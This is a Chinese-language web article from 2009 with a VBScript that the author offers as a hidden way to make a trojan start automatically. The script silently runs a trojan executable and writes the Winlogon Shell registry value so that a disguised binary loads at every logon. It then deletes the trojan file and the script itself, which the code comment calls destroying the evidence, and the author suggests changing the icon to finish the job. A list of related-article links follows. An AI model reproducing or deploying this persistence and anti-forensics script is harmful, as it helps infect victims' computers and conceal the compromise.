vbs 注冊表實現(xiàn)木馬自啟動

更新時間：2009年05月13日 17:06:34 作者：

自己搗鼓了半天，終于寫出了個腳本，實現(xiàn)flux在注冊表中的啟動，當然是更隱蔽的方法，別人知道了這個地方也就沒戲了。

呵呵～不過別人一般沒這個閑工夫檢查那么多位置的！就連我也做不到～～

dim wsh 
set wsh=CreateObject("WScript.Shell") 
wsh.run "%windir%\flumasko.exe",0 //運行木馬程序 
set sm=Wscript.CreateObject("WScript.Shell") 
sm.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","Explorer.exe %systemroot%\system32\winmgmt.exe" 
//寫進注冊表項實現(xiàn)自啟動 
set WshShell=WScript.CreateObject("WScript.Shell") 
WScript.Sleep 2000 
//等木馬的執(zhí)行完畢 
Set fso=CreateObject("Scripting.FileSystemObject") 
f=fso.DeleteFile ("flumasko.exe") 
f=fso.DeleteFile (WScript.ScriptName) 
//毀尸滅跡 

再修改下圖標就大功告成了！

相關(guān)文章

VBS教程：函數(shù)-StrReverse 函數(shù)
VBS教程：函數(shù)-StrReverse 函數(shù)...
2006-11-11
VBS教程：VBscript屬性-IgnoreCase 屬性
VBS教程：VBscript屬性-IgnoreCase 屬性...
2006-11-11
利用WMI實現(xiàn)系統(tǒng)補丁檢測分析
非常不錯的應(yīng)用，獲取當前系統(tǒng)補丁的版本來判斷補丁。
2009-04-04
adodb.stream讀文件到數(shù)組的代碼
用adodb.stream讀取文件并保存為數(shù)組的實現(xiàn)代碼
2008-08-08
VBS教程：方法-Delete 方法
VBS教程：方法-Delete 方法...
2006-11-11
vbs腳本實現(xiàn)批量轉(zhuǎn)換文件編碼
這篇文章主要介紹了vbs腳本實現(xiàn)批量轉(zhuǎn)換文件編碼,可以批量對文件在Gb2312和UTF-8編碼間互相轉(zhuǎn)換,需要的朋友可以參考下
2014-06-06
在VBS中定義字節(jié)數(shù)組Byte()介紹
在VBS中有辦法定義字節(jié)數(shù)組么？就是字節(jié)子類型數(shù)組（VarType是8209的那種）注意不是VB
2013-01-01
可以將文件轉(zhuǎn)換為vbs語句的vbs代碼
可以將文件轉(zhuǎn)換為vbs語句的vbs代碼...
2007-03-03
用vbs寫的短小精悍的字典生成器
'code by lcx ,很好,很強大,很黃很暴力,很傻很天真,很zd很cnn '這個程序是算不同數(shù)字與字母的所有排列組合,當然可以做為字典生成器來用.如需不同組合,只需改本程序a和b的變量即可以.
2008-05-05
用vbs實現(xiàn)定時運行web文件的方法
用vbs實現(xiàn)定時運行web文件的方法...
2007-03-03